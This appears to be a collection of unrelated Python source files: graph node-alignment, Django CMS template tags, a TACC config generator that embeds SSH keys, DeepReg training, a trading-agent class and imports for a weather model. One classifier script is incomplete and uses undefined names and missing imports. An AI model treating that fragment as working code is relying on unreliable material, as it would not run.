PYTHON_REQUIRES = ">=3.8"
REQUIRES = [
"click",
"email-validator",
"emails",
"fastapi",
"orjson",
"passlib[bcrypt]",
"pydantic",
"python-jose[cryptography]",
"python-multipart",
"sqlalchemy",
"tenacity",
"uvicorn",
]
EXTRAS_REQUIRE = {
"postgres": ["psycopg2-binary"],
}
ENTRY_POINTS = {
"console_scripts": [
"app=app.cli.core:main",
]
}
#
# Setup
#
setup(
name='app',
packages=find_packages(include=PACKAGES),
python_requires=PYTHON_REQUIRES,
install_requires=REQUIRES,
extras_require=EXTRAS_REQUIRE,
entry_points=ENTRY_POINTS,
test_suite="tests",
include_package_data=True,
zip_safe=False,
)
|
import argparse as ap
import math
import multiprocessing as mp
import networkx as nx
import utils
from seed_based_main import seed_based_mapping
def compute_init_seed(i1, N, m, d1, deg2, deg2_len, g1, g2):
print(f'From g1 {i1}/{N}')
g1_nbrs1 = utils.knbrs(g1, m, 1)
g1_nbrs1_len = len(g1_nbrs1) + 1
g1_nbrs1_edge_len = g1.subgraph(g1_nbrs1).number_of_edges()
g1_nbrs2 = utils.knbrs(g1, m, 2)
g1_nbrs2_len = len(g1_nbrs2)
g1_nbrs2_only = set(g1_nbrs2) - set(g1_nbrs1)
g1_nbrs2_edge_len = g1.subgraph(g1_nbrs2_only).number_of_edges()
g1_nbrs3 = utils.knbrs(g1, m, 3)
g1_nbrs3_len = len(g1_nbrs3)
g1_nbrs3_only = set(g1_nbrs3) - set(g1_nbrs2)
g1_nbrs3_edge_len = g1.subgraph(g1_nbrs3_only).number_of_edges()
sim = {}
for i2, (n, d2) in enumerate(deg2, 1):
print(f'\tg1 {i1}/{N} to g2 {n}[{i2}/{deg2_len}]')
g2_nbrs1 = utils.knbrs(g2, n, 1)
g2_nbrs1_len = len(g2_nbrs1)
g2_nbrs1_edge_len = g2.subgraph(g2_nbrs1).number_of_edges()
r1_A = (g1_nbrs1_edge_len * g2_nbrs1_edge_len) / (g1_nbrs1_len * g2_nbrs1_len)
r1_B = abs(d1 / g1_nbrs1_edge_len - d2 / g2_nbrs1_edge_len)
r1 = r1_A * r1_B
g2_nbrs2 = utils.knbrs(g2, n, 2)
g2_nbrs2_len = len(g2_nbrs2)
g2_nbrs2_only = set(g2_nbrs2) - set(g2_nbrs1)
g2_nbrs2_edge_len = g2.subgraph(g2_nbrs2_only).number_of_edges()
r2_A = (g1_nbrs2_edge_len * g2_nbrs2_edge_len) / (len(g1_nbrs2_only) * len(g2_nbrs2_only))
r2_B = abs(len(g1_nbrs2_only) / g1_nbrs2_len - len(g2_nbrs2_only) / g2_nbrs2_len)
r2 = r2_A * r2_B
g2_nbrs3 = utils.knbrs(g2, n, 3)
g2_nbrs3_len = len(g2_nbrs3)
g2_nbrs3_only = set(g2_nbrs3) - set(g2_nbrs2)
g2_nbrs3_edge_len = g2.subgraph(g2_nbrs3_only).number_of_edges()
r3_A = (g1_nbrs3_edge_len * g2_nbrs3_edge_len) / (len(g1_nbrs3_only) * len(g2_nbrs3_only))
r3_B = abs(len(g1_nbrs3_only) / g1_nbrs3_len - len(g2_nbrs3_only) / g2_nbrs3_len)
r3 = r3_A * r3_B
r = math.exp(3 / math.exp(r1 + r2 + r3)) - 1
sim[(m, n)] = r
top = max(sim, key=sim.get)
return top, sim[top]
def seed_free_mapping(args):
print(f'##### Running with {args["num_workers"]} workers... #####')
g1 = nx.read_edgelist(args["g1_edgelist_file"], nodetype=int)
g2 = nx.read_edgelist(args["g2_edgelist_file"], nodetype=int)
lim = min(g1.number_of_nodes(), args['seed_init_num'], g2.number_of_nodes())
deg1 = dict(g1.degree())
deg1 = sorted(deg1.items(), key=lambda kv: kv[1], reverse=True)[0:lim]
deg2 = dict(g2.degree())
deg2 = sorted(deg2.items(), key=lambda kv: kv[1], reverse=True)[0:2 * lim]
params = []
for i, (m, d1) in enumerate(deg1, 1):
params.append([i, lim, m, d1, deg2, len(deg2), g1, g2])
SEED = {}
with mp.Pool(processes=args['num_workers']) as pool:
for (m, n), s in pool.starmap_async(compute_init_seed, params).get():
SEED[(m, n)] = s
seed_str = [f'{a} {b}\n' for (a, b), _ in SEED.items()]
with open(args["output_file"], 'w') as f:
f.writelines(seed_str)
f.flush()
if __name__ == "__main__":
ap = ap.ArgumentParser()
ap.add_argument("-nw", "--num_workers", required=True, type=int, help="Number of workers.")
ap.add_argument("-g1", "--g1_edgelist_file", required=True, type=str, help="Path to g1 edgelist.")
ap.add_argument("-g2", "--g2_edgelist_file", required=True, type=str, help="Path to g2 edgelist.")
ap.add_argument("-sin", "--seed_init_num", default=500, type=int, help="Number of seeds mappings to extract.")
ap.add_argument("-out", "--output_file", default="mapping_result.txt", type=str, help="Path to output file.")
ap.add_argument("-mpi", "--map_per_itr", default=1000, type=int,
help="Number of nodes to map on each global iteration")
args = vars(ap.parse_args())
seed_free_mapping(args)
args['seed_mapping_file'] = args['output_file']
seed_based_mapping(args)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from classytags.core import Tag, Options
from cms.utils.encoder import SafeJSONEncoder
from django import template
from django.utils.safestring import mark_safe
from sekizai.helpers import get_varname
from cms.models import StaticPlaceholder
register = template.Library()
@register.filter('json')
def json_filter(value):
"""
Returns the JSON representation of ``value`` in a safe manner.
"""
return mark_safe(json.dumps(value, cls=SafeJSONEncoder))
@register.filter
def bool(value):
if value:
return 'true'
else:
return 'false'
@register.simple_tag(takes_context=True)
def render_cms_structure_js(context, renderer, obj):
markup_bits = []
static_placeholders = []
page_placeholders_by_slot = obj.rescan_placeholders()
declared_static_placeholders = obj.get_declared_static_placeholders(context)
for static_placeholder in declared_static_placeholders:
kwargs = {
'code': static_placeholder.slot,
'defaults': {'creation_method': StaticPlaceholder.CREATION_BY_TEMPLATE}
}
if static_placeholder.site_bound:
kwargs['site'] = renderer.current_site
else:
kwargs['site_id__isnull'] = True
static_placeholder = StaticPlaceholder.objects.get_or_create(**kwargs)[0]
static_placeholders.append(static_placeholder)
for placeholder_node in obj.get_declared_placeholders():
page_placeholder = page_placeholders_by_slot.get(placeholder_node.slot)
if page_placeholder:
placeholder_js = renderer.render_page_placeholder(obj, page_placeholder)
markup_bits.append(placeholder_js)
for placeholder in static_placeholders:
placeholder_js = renderer.render_static_placeholder(placeholder)
markup_bits.append(placeholder_js)
return mark_safe('\n'.join(markup_bits))
@register.simple_tag(takes_context=True)
def render_plugin_init_js(context, plugin):
renderer = context['cms_renderer']
plugin_js = renderer.get_plugin_toolbar_js(plugin)
# Add the toolbar javascript for this plugin to the
# sekizai "js" namespace.
context[get_varname()]['js'].append('<script data-cms>{}</script>'.format(plugin_js))
class JavascriptString(Tag):
name = 'javascript_string'
options = Options(
blocks=[
('end_javascript_string', 'nodelist'),
]
)
def render_tag(self, context, **kwargs):
try:
from django.utils.html import escapejs
except ImportError:
from django.utils.text import javascript_quote as escapejs
rendered = self.nodelist.render(context)
return "'%s'" % escapejs(rendered.strip())
register.tag(JavascriptString)
|
#!/usr/bin/env python
import os
import argparse
import json
from pprint import pprint
parser = argparse.ArgumentParser()
parser.add_argument("tacc_username")
parser.add_argument("tacc_project")
parser.add_argument("storage_path")
parser.add_argument("private_key")
parser.add_argument("template_file")
parser.add_argument("tmp_dir")
args = parser.parse_args()
with open(args.template_file) as f:
s = f.read()
s = s.replace('${USERNAME}', args.tacc_username)
s = s.replace('${PROJECT}', args.tacc_project)
s = s.replace('${WORKD}', args.storage_path)
jsonDoc = json.loads(s)
with open(args.private_key) as priv:
privkey = priv.read()
pubkey_file = args.private_key + '.pub'
with open(pubkey_file) as publ:
pubkey = publ.read()
stanzas = ['login', 'storage']
for stanza in stanzas:
if stanza in jsonDoc:
jsonDoc[stanza]['auth']['privateKey'] = privkey
jsonDoc[stanza]['auth']['publicKey'] = pubkey
# Write out to ~/tmp/system.json
outfilename = args.tmp_dir + '/' + os.path.splitext( os.path.basename(args.template_file) )[0] + '.json'
if not os.path.exists(os.path.dirname(outfilename)):
try:
os.makedirs(os.path.dirname(outfilename))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
with open(outfilename, 'w') as outfile:
json.dump(jsonDoc, outfile, indent=4)
|
"""
Module to train a network using init files and a CLI
"""
import argparse
import logging
import os
from datetime import datetime
import tensorflow as tf
import deepreg.config.parser as config_parser
import deepreg.model.optimizer as opt
from deepreg.dataset.load import get_data_loader
from deepreg.model.network.build import build_model
def init(config_path, log_dir, ckpt_path):
"""
Function to initialise log directories,
assert that checkpointed model is the right
type and to parse the configuration for training
:param config_path: list of str, path to config file
:param log_dir: str, path to where training logs
to be stored.
:param ckpt_path: str, path where model is stored.
"""
# init log directory
log_dir = os.path.join(
"logs", datetime.now().strftime("%Y%m%d-%H%M%S") if log_dir == "" else log_dir
)
if os.path.exists(log_dir):
logging.warning("Log directory {} exists already.".format(log_dir))
else:
os.makedirs(log_dir)
# check checkpoint path
if ckpt_path != "":
if not ckpt_path.endswith(".ckpt"):
raise ValueError("checkpoint path should end with .ckpt")
# load and backup config
config = config_parser.load_configs(config_path)
config_parser.save(config=config, out_dir=log_dir)
return config, log_dir
def train(
gpu: str, config_path: list, gpu_allow_growth: bool, ckpt_path: str, log_dir: str
):
"""
Function to train a model
:param gpu: str, which local gpu to use to train
:param config_path: str, path to configuration set up
:param gpu_allow_growth: bool, whether or not to allocate
whole GPU memory to training
:param ckpt_path: str, where to store training ckpts
:param log_dir: str, where to store logs in training
"""
# env vars
os.environ["CUDA_VISIBLE_DEVICES"] = gpu
os.environ["TF_FORCE_GPU_ALLOW_GROWTH"] = "true" if gpu_allow_growth else "false"
# load config
config, log_dir = init(config_path, log_dir, ckpt_path)
dataset_config = config["dataset"]
preprocess_config = config["train"]["preprocess"]
optimizer_config = config["train"]["optimizer"]
model_config = config["train"]["model"]
loss_config = config["train"]["loss"]
num_epochs = config["train"]["epochs"]
save_period = config["train"]["save_period"]
histogram_freq = save_period
# data
data_loader_train = get_data_loader(dataset_config, "train")
if data_loader_train is None:
raise ValueError(
"Training data loader is None. Probably the data dir path is not defined."
)
data_loader_val = get_data_loader(dataset_config, "valid")
dataset_train = data_loader_train.get_dataset_and_preprocess(
training=True, repeat=True, **preprocess_config
)
dataset_val = (
data_loader_val.get_dataset_and_preprocess(
training=False, repeat=True, **preprocess_config
)
if data_loader_val is not None
else None
)
dataset_size_train = data_loader_train.num_samples
dataset_size_val = (
data_loader_val.num_samples if data_loader_val is not None else None
)
steps_per_epoch_train = max(
dataset_size_train // preprocess_config["batch_size"], 1
)
steps_per_epoch_valid = (
max(dataset_size_val // preprocess_config["batch_size"], 1)
if data_loader_val is not None
else None
)
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
# model
model = build_model(
moving_image_size=data_loader_train.moving_image_shape,
fixed_image_size=data_loader_train.fixed_image_shape,
index_size=data_loader_train.num_indices,
labeled=dataset_config["labeled"],
batch_size=preprocess_config["batch_size"],
model_config=model_config,
loss_config=loss_config,
)
# compile
optimizer = opt.get_optimizer(optimizer_config)
model.compile(optimizer=optimizer)
# load weights
if ckpt_path != "":
model.load_weights(ckpt_path)
# train
# callbacks
tensorboard_callback = tf.keras.callbacks.TensorBoard(
log_dir=log_dir, histogram_freq=histogram_freq
)
checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
filepath=log_dir + "/save/weights-epoch{epoch:d}.ckpt",
save_weights_only=True,
period=save_period,
)
# it's necessary to define the steps_per_epoch and validation_steps to prevent errors like
# BaseCollectiveExecutor::StartAbort Out of range: End of sequence
model.fit(
x=dataset_train,
steps_per_epoch=steps_per_epoch_train,
epochs=num_epochs,
validation_data=dataset_val,
validation_steps=steps_per_epoch_valid,
callbacks=[tensorboard_callback, checkpoint_callback],
)
data_loader_train.close()
if data_loader_val is not None:
data_loader_val.close()
def main(args=None):
"""Entry point for train script"""
parser = argparse.ArgumentParser(
description="train", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
## ADD POSITIONAL ARGUMENTS
parser.add_argument(
"--gpu",
"-g",
help="GPU index for training."
'-g "" for using CPU'
'-g "0" for using GPU 0'
'-g "0,1" for using GPU 0 and 1.',
type=str,
required=True,
)
parser.add_argument(
"--gpu_allow_growth",
"-gr",
help="Prevent TensorFlow from reserving all available GPU memory",
default=False,
)
parser.add_argument(
"--ckpt_path",
"-k",
help="Path of the saved model checkpoint to load."
"No need to provide if start training from scratch.",
default="",
type=str,
required=False,
)
parser.add_argument(
"--log_dir",
"-l",
help="Name of log directory. The directory is under logs/."
"If not provided, a timestamp based folder will be created.",
default="",
type=str,
)
parser.add_argument(
"--config_path",
"-c",
help="Path of config, must end with .yaml. Can pass multiple paths.",
type=str,
nargs="+",
required=True,
)
args = parser.parse_args(args)
train(
args.gpu, args.config_path, args.gpu_allow_growth, args.ckpt_path, args.log_dir
)
if __name__ == "__main__":
main()
|
from __future__ import print_function
import os
import sys
import argparse
import _pickle as pickle
import ngrams_features_creator
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_score, recall_score, roc_curve, auc
#from sklearn.cluster import KMeans
# %% train test data splits
X_train, X_test, y_train, y_test = train_test_split(X_features, y_labels, test_size = 0.15, shuffle = False)
print('The first 2 training sample :', (X_train[0:1]))
# %% Construct learning pipelines for classification model
# standard MNB
pipe_mnb = Pipeline([('p1',MinMaxScaler()),('MNB', MultinomialNB())])
# NB for imbalance data
pipe_cnb = Pipeline([('p2',MinMaxScaler()), ('CNB', ComplementNB())])
# create a list of pipeline and fit training data on it
classifier_pipe = [pipe_mnb, pipe_cnb]#, pipe_knn, pipe_nc]
#create dictionary of pipeline classifiers
pipe_dic = {0: 'pipe_mnb', 1: 'pipe_cnb'}#,
#2:'knn', 3: 'kc'}
# fit training data on the classifier pipe
for pipe in classifier_pipe:
pipe.fit(X_train, y_train)
# validate models on training set
perf_train = []
for indx, val in enumerate(classifier_pipe):
perf_trg = pipe_dic[indx], val.score(X_train,y_train)
perf_train.append(perf_trg)
# validate models on test set
perf_test = []
for indx, val in enumerate(classifier_pipe):
perf_tst1 = pipe_dic[indx], val.score(X_test,y_test)
perf_test.append(perf_tst1)
# %% Performance visualisations on tablular dataframe
# convert train and test details to data frame
pd_ptrain = pd.DataFrame(perf_train)
pd_ptest = pd.DataFrame(perf_test)
# concatinate dataframes
perf_log1 = pd.concat(
[pd_ptrain.rename(columns={ 0: 'Classifiers', 1: 'train_performance'}),
pd_ptest.rename(columns={ 0: 'Classifiers1', 1: 'test_performance'}),], axis = 1
)
# create a simplified log out for models performances
perf_log = perf_log1.drop(['Classifiers1'], axis =1)
print('models performances on train and test datasets:', (perf_log))
# select and save the best classifier model
max(perf_log.test_performance)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Implement an agent interface to interact with Neutrino API and simulate the
enrionemnt to allow testing the strategies created
@author: ucaiado
Created on 05/07/2018
'''
from __future__ import print_function
import json
import logging
import signal
import sys
import os
import yaml
from neutrinogym.qcore import (PATH, PROD, VERB)
# simulation imports
if not PROD:
from neutrinogym import neutrino
from neutrinogym.neutrino import (fx, Source, NotificationEvent)
from .utils.neutrino_utils import DoubleWrapperError
# production imports
else:
import neutrino
from neutrino import (fx, Source, NotificationEvent)
from base import logger
# agent imports
from .utils.handle_orders import (OrderHandler, Instrument)
from .utils.CandleHistory import CandleHistory
from .utils.handle_data import (CandlesHandler, fill_orderinfo, BookHandler)
from .utils.neutrino_utils import (SubscrType, CandleIntervals, get_begin_time)
from .utils.neutrino_utils import (SymbolSubscriptionError, neutrino_now)
import pdb
'''
Begin help functions
'''
def include_to_this_order(order_info, d_info):
'''
Include a new userData to the order.current in OrderInfo
:param order_info: OrderInfo.
:param d_info: dict. Information to persist
'''
order_info.neutrino_order.current.userData = d_info
def signal_handler(i_signal, frame):
'''
Terminate neutrino when receiving Ctrl+C from anywhere
'''
if i_signal == 2:
print('signal_handler(): You pressed Ctrl+C!')
fx.quit()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
'''
End help functions
'''
orders = OrderHandler()
books = BookHandler()
candles = CandlesHandler()
class Agent(object):
'''
A generic implementation of an agent that interact with the Neutrino class.
The main API methods that users of this class need to know are:
on_initialize
on_book_update
on_order_fill
on_order_update
on_candle_update
And set the following attributes:
command_space: The Command object correspondign to valid commands
The methods are accessed publicly as "on_initialize", "on_order_fill", etc.
'''
# Set these in SOME subclasses
_baseagent = 'Agent'
i_id = 11 # simulation attribute
action_obj = None # simulation attribute
_instr_from_conf = [] # simulation attribute
brain = None # RL variable
# Set this in ALL subclasses
command_space = None
# Override these subclasses
def on_initialize(self): raise NotImplementedError
def on_book_update(self, instrument): pass
def on_order_fill(self, order_info, f_lastpx, i_lastqty): pass
def on_order_update(self, order_info, s_rejected=''): pass
def on_candle_update(self, candle_data): pass
def on_idle(self): pass
# Do not override
def display(self, book): pass
def processQuit(self):
'''
Process Quit command from AlgoManager
'''
self._should_quit = True
self.set_offline()
self.print_debug_msg(self._mlogs['pquit'], True)
def initialize(self, symbols=None):
# production stuff
if PROD:
logger.set_logger(os.getcwd())
d_config = json.loads(open(fx.getConfigFile(), 'r').read())
self._instr_from_conf = [x['Symbol'] for x in d_config['Symbols']]
# initialize an Orders and Books objects
orders.set_owner(self)
books.set_owner(self)
candles.reset()
# initialize attributes
self._instr = []
self._instr_stack = {}
self._disable_bid = True
self._disable_ask = True
self._done = True # the agent start disabled
self._should_quit = False
self.f_time_to_debug = 0
self._last_setoffline = 0
self._last_emptysettings = 10e9
self._no_msg_printed_yet = True
self._mlogs = yaml.safe_load(open(PATH + '/conf/conf_logs.yaml', 'r'))
self._mlogs = self._mlogs['Agent']
self._msg_offline = self._mlogs['offline1']
# control candles updates
self._last_candle_update = {}
self.dcandle = 0.1
# initialize specific attributes of the agent
self.on_initialize()
def symbolsLoaded(self):
'''
Indicate that the instrument was loaded and is ready to use
'''
# check the instruments and candles subscribed in on_initialize
f_fxnow = neutrino_now(b_ts=True) # simulation
s_msg = candles.on_symbols_load(f_fxnow=f_fxnow)
self.update_emptysettingctrl(b_new=True) # check pings
if s_msg:
s_msg = self._mlogs['symbol'] % s_msg
self.print_debug_msg(s_msg, True)
for instrument in iter(self._instr_stack.values()):
# instatiate initial list of orders
instrument.on_symbols_load(self)
def bidSide(self, source, book=None):
'''
Update the bid orders from the agent, given an event (source) that can
be mkt, commd, order or idle
:param source: string. The source of the update
:param *book: Neutrino Book object. The book updated
'''
print(source)
if source == Source.IDLE:
self.on_idle()
self.update_emptysettingctrl() # check pings
return
if not book or book.name() not in self._instr_stack:
return
if (book and fx.isOnline(book.name())) or (source == Source.IDLE):
instrument = self._instr_stack.get(book.name())
self.on_book_update(instrument)
self.update_emptysettingctrl() # check pings
candles.check_pending_candles_subscriptions(int(neutrino_now()))
def askSide(self, source, book=None):
'''
Update the ask orders from the agent, given an event (source) that can
be mkt, commd, order or idle
:param source: Neutrino Source object.
:param *book: Neutrino Book object. The book updated
'''
if not book or book.name() not in self._instr_stack:
return
if book and fx.isOnline(book.name()):
instrument = self._instr_stack.get(book.name())
self.on_book_update(instrument)
def orderFilled(self, order, lastpx, lastqty):
'''
Indicate that a trade has happened. Give the agent the opportunity to
close its position before update the data related to the order
:param order: neutruno Order object. the order filled
:param lastpx: float. last execution price
:param lastqty: integer. last qty filled of the Order
'''
# update positions controls
s_symbol = order.symbol
instr = self._instr_stack[s_symbol]
orders.send_cancel_acc(order, 'E')
instr.update_position(order, lastpx, lastqty)
instr.update_active_qty(order, 'E', lastqty)
# log order
s_time = (neutrino_now(True))[:-3] # simulation
s_msg = self._mlogs['fill']
s_msg = s_msg.format(
s_time,
lastqty,
order.userData['id'],
s_symbol,
lastpx,
order.side
)
self.print_debug_msg(s_msg, True, True)
# call agent's specific handling
order_data = fill_orderinfo(order)
self.on_order_fill(order_data, lastpx, lastqty)
def orderUpdated(self, order, rejected=''):
'''
Indicate that an order was updated
:param order: neutruno Order object. the order filled
:param rejected: string. If the order was rejected
'''
s_msg = self._mlogs['order'].format(
order.side,
order.symbol,
order.userData['id']
)
# if not isinstance(rejected, (str, unicode)):
# rejected = ''
if order.current:
s_msg += self._mlogs['ord1'].format(
order.current.secondaryOrderID,
order.current.status
)
instr = self._instr_stack[order.symbol]
instr.update_order_ctrls(order)
if str(order.current.status) in ['CANCELLED', 'REJECTED']:
i_cumqty = order.current.cumQty
i_cumqty = i_cumqty if abs(i_cumqty) < 10**7 else 0
i_qty = order.current.qty - i_cumqty
instr.update_active_qty(order, 'RC', i_qty)
order_data = fill_orderinfo(order)
self.on_order_update(order_data, rejected)
if not order.isAlive():
pass
self.update_emptysettingctrl(b_newordr=True) # check pings
if rejected:
s_msg += self._mlogs['ord2'].format(rejected)
self.print_debug_msg(s_msg, True, True) # production
def indicatorData(self, raw_data):
'''
Update the Dataobject using the information inside raw_data
:param raw_data: Flatbuffer object.
'''
hist = CandleHistory.GetRootAsCandleHistory(raw_data, 0)
s_aux = str(hist.Indicator())
f_time = neutrino_now()
if (f_time - self._last_candle_update.get(s_aux, 0)) < self.dcandle:
return
self._last_candle_update[s_aux] = f_time
s_instrument = s_aux.split(':')[1]
b_is_all_updated = candles.update(hist)
if b_is_all_updated:
i_interval = hist.Interval()
this_candle = candles.get_candle(None, s_instrument, i_interval)
self.on_candle_update(this_candle)
def setOffline(self):
'''
Set agent to offline (stop sending new orders) and cancel all its alive
orders
'''
f_time = neutrino_now()
if f_time - self._last_setoffline > 2.:
self._last_setoffline = f_time
self.set_offline()
def prtbrdcast(self, s_msg):
'''
Print the message passed to a log file and broadcast it (print the
mesage in telnet screen, for example, or return it as a response to a
socket requisition)
:param s_msg: string. Message to be printed
'''
# production (no option, just comment the line bellow)
# fx.broadcast(s_msg) # simulation (not available just to quantick)
self.print_debug_msg(s_msg, True)
def command(self, source, s_command):
'''
Process the command received bu socket. '_command' should return if it
was able to execute the command passed
:param source: neutrino Socket object.
:param s_command: string. the string sent by the command line
:return: Return True if the string command is used, False otherwise
'''
self.command_space.on_command(s_command)
def processSetParameters(self, s_param):
'''
Process parameters passed. The auxiliary on_set_parameters method
should return a list of commands to be passed to command() method
:param s_param: string. JSON encoded as a string. the primary key is
the agent's name, that is used to check if the right agent is
receiving the parameters. e.g.:
{'agentname': {'param1': values, 'param2': values}}
:return:
'''
try:
d_parameters = json.loads(s_param)
l_commands = self.command_space.on_set_parameters(d_parameters)
for d_command in l_commands:
self.command_space.on_command(d_command)
except:
fx.quit()
raise
def processGetParameters(self):
'''
Process getParameters. The method auxiliary on_get_parameters
method should return
a dictionary
:param source: neutrino Socket object.
:param s_command: string. the string sent by the command line
:return: dictionary configured as a dictionary
'''
self.update_emptysettingctrl(b_new=True) # check pings
try:
d_config = self.command_space.on_get_parameters()
return json.dumps(d_config)
except:
fx.quit()
raise
def lostMarketFeed(self):
'''
Inform the strategy that the neutrino lost connection to the market
data server. It is called only by Quantick in the production
environment.
'''
self._should_quit = True
self.set_offline()
self.print_debug_msg(self._mlogs['mktfeed'], True)
fx.quit()
# Simulation methods
def setup_simulation(self, i_agentid=11, l_instr_from_conf=None,
brain=None):
'''
Subscribe instrument list, agent id and maximum stack of orders.
Agent ID is used just by the gym. Not required in production
environment
:l_instr_from_conf: list. Insmtruments on config file
:param *i_agent_id: integer. Id of the agent
'''
self.i_id = i_agentid
self._instr_from_conf = l_instr_from_conf
# set RL agents parameters
self.brain = brain
# Other methods
def subscribe(self, s_symbol, subcr_type=SubscrType.BOOK, **kwargs):
'''
Subscribe the instrument or candle desidered
:param s_symbol: string. the instrument to subscribe
:param subcr_type: enum. what should be subscribed
:param *ords_stack_size: integer. to book. size of order stack
:param *i_interval: integer. to candles. The candle interval
:param *i_nbars: integer. to candles. bars to retrieve
:param *s_alias: sring. to candles. name alias to this candle
'''
if subcr_type == SubscrType.BOOK:
if s_symbol not in self._instr_from_conf:
raise SymbolSubscriptionError(self._mlogs['errsbc'] % s_symbol)
if s_symbol not in self._instr:
ords_stack_size = kwargs.get('ords_stack_size', 100)
self._instr.append(s_symbol)
this_instrument = Instrument(s_symbol, ords_stack_size)
self._instr_stack[s_symbol] = this_instrument
return this_instrument
elif subcr_type == SubscrType.CANDLES:
i_intv = kwargs.get('interval', CandleIntervals.MIN_1)
i_intv = i_intv.value
i_nbars = kwargs.get('i_nbars', 5)
s_aux = kwargs.get('s_alias', None)
this_candle = candles.subscribe(s_symbol, i_intv, i_nbars, s_aux)
return this_candle
else:
raise NotImplementedError(self._mlogs['errsbc2'] % subcr_type)
def print_debug_msg(self, s_msg, b_printanyway=False, b_notify_user=False):
'''
Control the amount of debug that is used
:param s_msg: string. Message to print
:param b_printanyway: boolean. If shoud time contraint
'''
f_time = neutrino_now()
if b_printanyway or f_time > self.f_time_to_debug + 5:
self.f_time_to_debug = f_time
logging.debug(s_msg)
if b_notify_user and VERB:
fx.notify(NotificationEvent.POPUP, s_msg)
def any_pending_orders(self):
'''
Return if there are any order active or pending
'''
for instrument in iter(self._instr_stack.values()):
if instrument._orders:
return True
return False
def is_offline(self):
'''
Return if the strategy is offline
'''
if self._done:
if self._no_msg_printed_yet:
self.print_debug_msg(self._msg_offline, True, True)
self._no_msg_printed_yet = False
else:
self.print_debug_msg(self._msg_offline)
orders.cancel_all_orders()
if self._should_quit and not self.any_pending_orders():
fx.quit()
return self._done
f_time = neutrino_now()
if self._should_quit and f_time - self._last_setoffline > 4.:
fx.quit()
return self._done
def update_emptysettingctrl(self, b_new=False, b_newordr=False):
'''
Update Quantick pings control. Set the strategy offline and quit it if
no communication is detected after 11min. The "ping" from Quantick
consists in an empty ProcessSetParameters. If the response from the
agent takes more than 1 minute, the Quantick marks it as failed. It
repeats this process every 3 min. If 3 pings failed in a row, the
Quantick considers that the strategy is not alive, so it should be
killed (if it is still is).
:param b_new: boolean. New ping indicator flag
:param b_newordr: New order flag. Penalize the strategy every time that
there is any order update without receiving pings from the Front.
'''
if b_new:
self._last_emptysettings = neutrino_now()
# production
if PROD:
self.print_debug_msg(self._mlogs['pingok'], True)
elif b_newordr:
if self._last_emptysettings > 420:
self._last_emptysettings -= 10
elif neutrino_now() - self._last_emptysettings > 900:
self._last_emptysettings = neutrino_now()
# production
if PROD:
self.print_debug_msg(self._mlogs['pingfault'], True, True)
self.set_offline()
self._should_quit = True
self.is_offline()
# simulation
pass
def set_initial_positions(self, d_position):
'''
Set the initial position in each instrument traded by the agent. It
should be passed as a JSON encoded as a string.
e.g.: {"PETR4": {"Q": 1000, "P": 10.0}}. "P" in optional
:param s_position: string. position by instrument
'''
# d_position = json.loads(s_position)
for s_symbol, d_pos in iter(d_position.items()):
instr = self._instr_stack.get(s_symbol, None)
if instr:
instr.set_initial_positions(self, d_pos)
def set_offline(self):
'''
Cancel all orders and do not send new ones
'''
self._done = True
self.is_offline()
def set_online(self):
'''
Enable the agent to send new orders
'''
self._no_msg_printed_yet = True
self._done = False
class AgentWrapper(Agent):
'''
Wrapper representation of the agent that is used to transform it in a
modular way
'''
agent = None
def __init__(self, agent):
self.agent = agent
self._ensure_no_double_wrap()
self._baseagent = 'AgentWrapper'
self.i_id = agent.i_id
self._instr_from_conf = self.agent._instr_from_conf
# self.initialize(self._instr_from_conf)
def initialize(self, symbols=None):
self.agent.initialize(symbols)
if hasattr(self.agent, '_instr'):
self._instr = self.agent._instr
self._instr_stack = self.agent._instr_stack
self._disable_bid = self.agent._disable_bid
self._disable_ask = self.agent._disable_ask
self._done = self.agent._done # the agent start disabled
self.f_time_to_debug = 0
self._last_setoffline = self.agent._last_setoffline
self._msg_offline = self.agent._msg_offline
@classmethod
def class_name(cls):
return cls.__name__
def set_action_object(self, action_obj):
self.agent.action_obj = action_obj
def _ensure_no_double_wrap(self):
agent = self.agent
while True:
if isinstance(agent, AgentWrapper):
if agent.class_name() == self.class_name():
s_err = self._mlogs['errwraper']
s_err = s_err.format(self.__class__.__name__)
raise DoubleWrapperError(s_err)
agent = agent.agent
else:
break
def symbolsLoaded(self):
return self.agent.symbolsLoaded()
def bidSide(self, source, book):
return self.agent.bidSide(source, book)
def askSide(self, source, book):
return self.agent.askSide(source, book)
def orderFilled(self, order, lastpx, lastqty):
return self.agent.orderFilled(order, lastpx, lastqty)
def orderUpdated(self, order, rejected=''):
return self.agent.orderUpdated(order)
def command(self, source, s_command):
return self.agent.command(source, s_command)
def setOffline(self):
return self.agent.setOffline()
def indicatorData(self, raw_data):
return self.agent.indicatorData(raw_data)
def processSetParameters(self, s_param):
return self.agent.processSetParameters(s_param)
def processGetParameters(self):
return self.agent.processGetParameters()
def processQuit(self):
return self.agent.processQuit()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 3 18:42:12 2021
@author: ghiggi
"""
import os
import torch
import time
import pickle
import dask
import numpy as np
from tabulate import tabulate
from modules.dataloader_autoregressive import AutoregressiveDataset
from modules.dataloader_autoregressive import AutoregressiveDataLoader
from modules.dataloader_autoregressive import get_aligned_ar_batch
from modules.dataloader_autoregressive import remove_unused_Y
from modules.dataloader_autoregressive import cylic_iterator
from modules.utils_autoregressive import check_ar_settings
from modules.utils_autoregressive import check_input_k
from modules.utils_autoregressive import check_output_k
from modules.utils_training import AR_TrainingInfo
from modules.utils_torch import check_device
from modules.utils_torch import check_pin_memory
from modules.utils_torch import check_asyncronous_gpu_transfer
from modules.utils_torch import check_prefetch_in_gpu
from modules.utils_torch import check_prefetch_factor
from modules.utils_torch import check_ar_training_strategy
from modules.utils_torch import get_time_function
from modules.utils_xr import xr_is_aligned
from modules.loss import reshape_tensors_4_loss
from modules.utils_swag import bn_update_with_loader
##----------------------------------------------------------------------------.
# TODOs
# - ONNX for saving model weights
# - Record the loss per variable
# - Compute additional metrics (R2, bias, rsd)
